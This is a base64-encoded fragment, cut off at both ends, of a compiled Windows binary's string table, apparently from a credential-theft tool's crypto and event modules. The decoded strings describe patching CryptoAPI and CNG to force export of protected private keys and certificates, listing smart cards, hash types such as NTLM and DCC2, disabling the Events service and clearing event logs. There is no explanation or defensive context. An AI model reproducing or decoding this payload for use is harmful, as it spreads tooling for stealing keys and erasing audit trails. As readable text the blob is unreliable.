CgAbwByACAAZQB4AHAAbwByAHQAKQAgAGsAZQB5AHMAIABjAG8AbgB0AGEAaQBuAGUAcgBzAAAAAABzAGMAAAAAAEwAaQBzAHQAIABzAG0AYQByAHQAYwBhAHIAZAAgAHIAZQBhAGQAZQByAHMAAAAAAAAAAABIAGEAcwBoACAAYQAgAHAAYQBzAHMAdwBvAHIAZAAgAHcAaQB0AGgAIABvAHAAdABpAG8AbgBhAGwAIAB1AHMAZQByAG4AYQBtAGUAAAAAAEQAZQBzAGMAcgBpAGIAZQAgAGEAIABXAGkAbgBkAG8AdwBzACAAUwB5AHMAdABlAG0AIABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAIAAoAGYAaQBsAGUALAAgAFQATwBEAE8AOgByAGUAZwBpAHMAdAByAHkAIABvAHIAIABoAGkAdgBlACkAAABzAGMAYQB1AHQAaAAAAAAAQwByAGUAYQB0AGUAIABhACAAYQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACAAYwBlAHIAdABpAHQAaQBmAGEAdABlACAAKABzAG0AYQByAHQAYwBhAHIAZAAgAGwAaQBrAGUAKQAgAGYAcgBvAG0AIABhACAAQwBBAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABQAGEAdABjAGgAIABDAHIAeQBwAHQAbwBBAFAASQAgAGwAYQB5AGUAcgAgAGYAbwByACAAZQBhAHMAeQAgAGUAeABwAG8AcgB0AAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAUABhAHQAYwBoACAAQwBOAEcAIABzAGUAcgB2AGkAYwBlACAAZgBvAHIAIABlAGEAcwB5ACAAZQB4AHAAbwByAHQAAAAAAGMAcgB5AHAAdABvAAAAAABDAHIAeQBwAHQAbwAgAE0AbwBkAHUAbABlAAAAcgBzAGEAZQBuAGgAAAAAAENQRXhwb3J0S2V5AG4AYwByAHkAcAB0AAAAAABOQ3J5cHRPcGVuU3RvcmFnZVByb3ZpZGVyAAAATkNyeXB0RW51bUtleXMAAE5DcnlwdE9wZW5LZXkAAABOQ3J5cHRJbXBvcnRLZXkATkNyeXB0RXhwb3J0S2V5AE5DcnlwdEdldFByb3BlcnR5AAAATkNyeXB0U2V0UHJvcGVydHkAAABOQ3J5cHRGcmVlQnVmZmVyAAAAAE5DcnlwdEZyZWVPYmplY3QAAAAAQkNyeXB0RW51bVJlZ2lzdGVyZWRQcm92aWRlcnMAAABCQ3J5cHRGcmVlQnVmZmVyAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABwAHIAbwB2AGkAZABlAHIAcwAgADoACgAAACUAMgB1AC4AIAAlAC0AMQAzAHMAIAAoACUAMgB1ACkAIAAtACAAJQBzAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHAAcgBvAHYAaQBkAGUAcgBzACAAOwAgAEMAcgB5AHAAdABFAG4AdQBtAFAAcgBvAHYAaQBkAGUAcgBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABwAHIAbwB2AGkAZABlAHIAIAB0AHkAcABlAHMAOgAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABDAHIAeQBwAHQARQBuAHUAbQBQAHIAbwB2AGkAZABlAHIAVAB5AHAAZQBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAoAQwBOAEcAIABwAHIAbwB2AGkAZABlAHIAcwAgADoACgAAACUAMgB1AC4AIAAlAHMACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABCAEMAcgB5AHAAdABFAG4AdQBtAFIAZQBnAGkAcwB0AGUAcgBlAGQAUAByAG8AdgBpAGQAZQByAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAAAAAABzAHkAcwB0AGUAbQBzAHQAbwByAGUAAABBAHMAawBpAG4AZwAgAGYAbwByACAAUwB5AHMAdABlAG0AIABTAHQAbwByAGUAIAAnACUAcwAnACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwB0AG8AcgBlAHMAIAA7ACAAQwBlAHIAdABFAG4AdQBtAFMAeQBzAHQAZQBtAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABzAGkAbABlAG4AdAAAAAAAbgBvAGsAZQB5AAAATQB5AAAAAABzAHQAbwByAGUAAAAAAAAAIAAqACAAUwB5AHMAdABlAG0AIABTAHQAbwByAGUAIAAgADoAIAAnACUAcwAnACAAKAAwAHgAJQAwADgAeAApAAoAIAAqACAAUwB0AG8AcgBlACAAIAAgACAAIAAgACAAIAAgADoAIAAnACUAcwAnAAoACgAAAAAAKABuAHUAbABsACkAAAAAAAkASwBlAHkAIABDAG8AbgB0AGEAaQBuAGUAcgAgACAAOgAgACUAcwAKAAkAUAByAG8AdgBpAGQAZQByACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAkAUAByAG8AdgBpAGQAZQByACAAdAB5AHAAZQAgACAAOgAgACUAcwAgACgAJQB1ACkACgAAAAAACQBUAHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAcgB5AHAAdABHAGUAdABVAHMAZQByAEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAawBlAHkAUwBwAGUAYwAgAD0APQAgAEMARQBSAFQAXwBOAEMAUgBZAFAAVABfAEsARQBZAF8AUwBQAEUAQwAgAHcAaQB0AGgAbwB1AHQAIABDAE4ARwAgAEgAYQBuAGQAbABlACAAPwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAaQB2AGEAdABlAEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQARwBlAHQAQwBlAHIAdABpAGYAaQBjAGEAdABlAEMAbwBuAHQAZQB4AHQAUAByAG8AcABlAHIAdAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQARwBlAHQATgBhAG0AZQBTAHQAcgBpAG4AZwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AE4AYQBtAGUAUwB0AHIAaQBuAGcAIAAoAGYAbwByACAAbABlAG4AKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQATwBwAGUAbgBTAHQAbwByAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAACgAlADIAdQAuACAAJQBzAAoAAAAgACAAIAAgACUAUwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzAF8AYwBhAHAAaQAgADsAIABDAHIAeQBwAHQARwBlAHQAVQBzAGUAcgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzAF8AYwBhAHAAaQAgADsAIABDAHIAeQBwAHQARwBlAHQAUAByAG8AdgBQAGEAcgBhAG0AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAXwBjAGEAcABpACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAbwBuAHQAZQB4AHQAIAAoADAAeAAlADAAOAB4ACkACgAAAHAAcgBvAHYAaQBkAGUAcgAAAAAAcAByAG8AdgBpAGQAZQByAHQAeQBwAGUAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBvAGYAdAB3AGEAcgBlACAASwBlAHkAIABTAHQAbwByAGEAZwBlACAAUAByAG8AdgBpAGQAZQByAAAAYwBuAGcAcAByAG8AdgBpAGQAZQByAAAAIAAqACAAUwB0AG8AcgBlACAAIAAgACAAIAAgACAAIAAgADoAIAAnACUAcwAnAAoAIAAqACAAUAByAG8AdgBpAGQAZQByACAAIAAgACAAIAAgADoAIAAnACUAcwAnACAAKAAnACUAcwAnACkACgAgACoAIABQAHIAbwB2AGkAZABlAHIAIAB0AHkAcABlACAAOgAgACcAJQBzACcAIAAoACUAdQApAAoAIAAqACAAQwBOAEcAIABQAHIAbwB2AGkAZABlAHIAIAAgADoAIAAnACUAcwAnAAoAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABrAGUAeQBzACAAOgAKAAAAAAAKAEMATgBHACAAawBlAHkAcwAgADoACgAAAAAAVQBuAGkAcQB1AGUAIABOAGEAbQBlAAAAIAAgACAAIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwAgADsAIABOAEMAcgB5AHAAdABPAHAAZQBuAEsAZQB5ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzACAAOwAgAE4AQwByAHkAcAB0AEUAbgB1AG0ASwBlAHkAcwAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAATgBDAHIAeQBwAHQATwBwAGUAbgBTAHQAbwByAGEAZwBlAFAAcgBvAHYAaQBkAGUAcgAgACUAMAA4AHgACgAAAAAARQB4AHAAbwByAHQAIABQAG8AbABpAGMAeQAAAEwAZQBuAGcAdABoAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcAByAGkAbgB0AEsAZQB5AEkAbgBmAG8AcwAgADsAIABOAEMAcgB5AHAAdABHAGUAdABQAHIAbwBwAGUAcgB0AHkAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAHIAaQBuAHQASwBlAHkASQBuAGYAbwBzACAAOwAgAEMAcgB5AHAAdABHAGUAdABLAGUAeQBQAGEAcgBhAG0AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAWQBFAFMAAABOAE8AAAAAAAkARQB4AHAAbwByAHQAYQBiAGwAZQAgAGsAZQB5ACAAOgAgACUAcwAKAAkASwBlAHkAIABzAGkAegBlACAAIAAgACAAIAAgACAAOgAgACUAdQAKAAAAAABSAFMAQQBQAFIASQBWAEEAVABFAEIATABPAEIAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABSAGEAdwBLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABOAEMAcgB5AHAAdABTAGUAdABQAHIAbwBwAGUAcgB0AHkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABSAGEAdwBLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABOAEMAcgB5AHAAdABJAG0AcABvAHIAdABLAGUAeQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABSAGEAdwBLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABOAG8AIABDAE4ARwAhAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AFIAYQB3AEsAZQB5AFQAbwBGAGkAbABlACAAOwAgAEMAcgB5AHAAdABJAG0AcABvAHIAdABLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAQwBBAFAASQBQAFIASQBWAEEAVABFAEIATABPAEIAAABPAEsAAAAAAEsATwAAAAAACQBQAHIAaQB2AGEAdABlACAAZQB4AHAAbwByAHQAIAA6ACAAJQBzACAALQAgAAAAJwAlAHMAJwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AEsAZQB5AFQAbwBGAGkAbABlACAAOwAgAEUAeABwAG8AcgB0ACAALwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABkAGUAcgAAAAkAUAB1AGIAbABpAGMAIABlAHgAcABvAHIAdAAgACAAOgAgACUAcwAgAC0AIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABDAGUAcgB0ACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAQwBlAHIAdAAgADsAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcABmAHgAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AEMAZQByAHQAIAA7ACAARQB4AHAAbwByAHQAIAAvACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAlAHMAXwAlAHMAXwAlAHUAXwAlAHMALgAlAHMAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwBjAF8AcAByAG8AdgB0AHkAcABlAGYAcgBvAG0AbgBhAG0AZQAgADsAIABDAHIAeQBwAHQARQBuAHUAbQBQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABcAFwALgBcAAAAAABTAEMAYQByAGQAJABBAGwAbABSAGUAYQBkAGUAcgBzAAAAAABTAG0AYQByAHQAQwBhAHIAZAAgAHIAZQBhAGQAZQByAHMAOgAKAAAACgAgACoAIAAlAHMACgAAACAAIAAgACAAQQBUAFIAIAAgADoAIAAAACAAIAAgACAATQBvAGQAZQBsADoAIAAlAHMACgAAAAAAIAAgACAAIABDAFMAUAAgACAAOgAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAIAA7ACAAUwBDAGEAcgBkAEcAZQB0AEMAYQByAGQAVAB5AHAAZQBQAHIAbwB2AGkAZABlAHIATgBhAG0AZQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwBjACAAOwAgAFMAQwBhAHIAZABMAGkAcwB0AEMAYQByAGQAcwA6ACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAIAA7ACAAUwBDAGEAcgBkAEcAZQB0AEEAdAB0AHIAaQBiADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHMAYwAgADsAIABTAEMAYQByAGQAQwBvAG4AbgBlAGMAdAA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwBjACAAOwAgAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHMAYwAgADsAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAA6ACAAMAB4ACUAMAA4AHgACgAAAE4AVABMAE0AOgAgAAAAAABEAEMAQwAxADoAIAAAAAAARABDAEMAMgA6ACAAAAAAAEwATQAgACAAOgAgAAAAAABNAEQANQAgADoAIAAAAAAAUwBIAEEAMQA6ACAAAAAAAFMASABBADIAOgAgAAAAAABbACUAMAA0AHgALwAlAHgAXQAgACUAcwAKAAAAIAAgAAAAAABQAHIAbwB2AGkAZABlAHIAIABpAG4AZgBvADoACgAAAAkASwBlAHkAIABDAG8AbgB0AGEAaQBuAGUAcgAgACAAOgAgACUAcwAKAAAACQBQAHIAbwB2AGkAZABlAHIAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAJAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAAgADoAIAAlAHMAIAAoACUAdQApAAoAAAAAAAkARgBsAGEAZwBzACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAAkAUABhAHIAYQBtACAAKAB0AG8AZABvACkAIAAgACAAOgAgACUAMAA4AHgAIAAvACAAJQAwADgAeAAKAAAAAAAKACoAIABGAGkAbABlADoAIAAnACUAcwAnAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBzAHkAcwB0AGUAbQAgADsAIABJAG4AcAB1AHQAIABNAGkAYwByAG8AcwBvAGYAdAAgAEMAcgB5AHAAdABvACAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAZgBpAGwAZQAgAG4AZQBlAGQAZQBkACAAKAAvAGYAaQBsAGUAOgBmAGkAbABlAG4AYQBtAGUAfABkAGkAcgBlAGMAdABvAHIAeQApAAoAAABjAHIAbAAAAGMAdABsAAAAawBlAHkAaQBkAAAARABhAHQAYQA6ACAAAAAAACUAcwAuACUAcwAAAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAOgAgACUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZgBpAGwAZQBfAHIAYQB3AEQAYQB0AGEAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoAF8AcQB1AGkAYwBrAEUAbgBjAG8AZABlACAAOwAgAEMAcgB5AHAAdABFAG4AYwBvAGQAZQBPAGIAagBlAGMAdAAgACgAZABhAHQAYQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaABfAHEAdQBpAGMAawBFAG4AYwBvAGQAZQAgADsAIABDAHIAeQBwAHQARQBuAGMAbwBkAGUATwBiAGoAZQBjAHQAIAAoAGkAbgBpAHQAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAxLjMuNi4xLjQuMS4zMTEuMjAuMi4zAAAyLjUuMjkuMTcAAAAyLjUuMjkuMTUAAAAyLjUuMjkuMzcAAAAyLjUuNC4zADIuNS40LjEwAAAAADIuNS40LjYARgBSAAAAAABMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAAAAYwBhAHMAdABvAHIAZQAAAGMAYQBuAGEAbQBlAAAAAAB1AHAAbgAAAEMAQQAgAHMAdABvAHIAZQAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAQwBBACAAbgBhAG0AZQAgACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAAABDAEEAIAB2AGEAbABpAGQAaQB0AHkAIAAgACAAIAA6ACAAAABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAIABVAFAATgA6ACAAJQBzAAoAAAAAADEuMy42LjEuNS41LjcuMy4yAAAAMS4zLjYuMS40LjEuMzExLjIwLjIuMgAASwBlAHkAIABjAG8AbgB0AGEAaQBuAGUAcgAgACAAOgAgACUAcwAKAAAAAABLAGUAeQAgAHAAcgBvAHYAaQBkAGUAcgAgACAAIAA6ACAAJQBzAAoAAAAAAFAAcgBpAHYAYQB0AGUAIABFAHgAcABvAHIAdAAgADoAIAAlAHMAIAAtACAAJQBzAAoAAAAAAAAAUAByAGkAdgBhAHQAZQAgAFMAdABvAHIAZQAgACAAOgAgAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAC8ATQB5ACAALQAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAEMAcgB5AHAAdABTAGkAZwBuAEEAbgBkAEUAbgBjAG8AZABlAEMAZQByAHQAaQBmAGkAYwBhAHQAZQAgACgAZABhAHQAYQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQAUwBpAGcAbgBBAG4AZABFAG4AYwBvAGQAZQBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAIAAoAGkAbgBpAHQAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwByAHkAcAB0AEUAeABwAG8AcgB0AFAAdQBiAGwAaQBjAEsAZQB5AEkAbgBmAG8AIAAoAGQAYQB0AGEAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQARQB4AHAAbwByAHQAUAB1AGIAbABpAGMASwBlAHkASQBuAGYAbwAgACgAaQBuAGkAdAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAEMAcgB5AHAAdABHAGUAbgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGQAZQBsAGUAdABlACAAdABlAG0AcAAgAGsAZQB5AHMAZQB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQAQQBjAHEAdQBpAHIAZQBDAG8AbgB0AGUAeAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAaQB2AGEAdABlAEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwBlAHIAdABGAGkAbgBkAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBJAG4AUwB0AG8AcgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwBlAHIAdABPAHAAZQBuAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAC8AdQBwAG4AOgB1AHMAZQByAEAAZABvAG0AYQBpAG4ALgBsAG8AYwBhAGwAIABuAGUAZQBkAGUAZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAALwBjAGEAbgBhAG0AZQA6AEMAQQAtAEsASQBXAEkAIABuAGUAZQBkAGUAZAAKAAAAcgBzAGEAZQBuAGgALgBkAGwAbAAAAAAATABvAGMAYQBsACAAQwByAHkAcAB0AG8AQQBQAEkAIABwAGEAdABjAGgAZQBkAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcABfAGMAYQBwAGkAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAF8AYwBhAHAAaQAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAABuAGMAcgB5AHAAdAAuAGQAbABsAAAAAABuAGMAcgB5AHAAdABwAHIAbwB2AC4AZABsAGwAAAAAAEsAZQB5AEkAcwBvAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcABfAGMAbgBnACAAOwAgAE4AbwAgAEMATgBHAAoAAABkAHIAbwBwAAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAcABhAHQAYwBoACAARQB2AGUAbgB0AHMAIABzAGUAcgB2AGkAYwBlACAAdABvACAAYQB2AG8AaQBkACAAbgBlAHcAIABlAHYAZQBuAHQAcwAAAGMAbABlAGEAcgAAAEMAbABlAGEAcgAgAGEAbgAgAGUAdgBlAG4AdAAgAGwAbwBnAAAAAABlAHYAZQBuAHQAAABFAHYAZQBuAHQAIABtAG8AZAB1AGwAZQAAAAAAZQB2AGUAbgB0AGwAbwBnAC4AZABsAGwAAAAAAHcAZQB2AHQAcwB2AGMALgBkAGwAbAAAAEUAdgBlAG4AdABMAG8AZwAAAAAAUwBlAGMAdQByAGkAdAB5AAAAAABsAG8AZwAAAFUAcwBpAG4AZwAgACIAJQBzACIAIABlAHYAZQBuAHQAIABsAG8AZwAgADoACgAAAC0AIAAlAHUAIABlAHYAZQBuAHQAKABzACkACgAAAAAALQAgAEMAbABlAGEAcgBlAGQAIAAhAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGUAdgBlAG4AdABfAGMAbABlAGEAcgAgADsAIABDAGwAZQBhAHIARQB2AGUAbgB0AEwAbwBnACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZQB2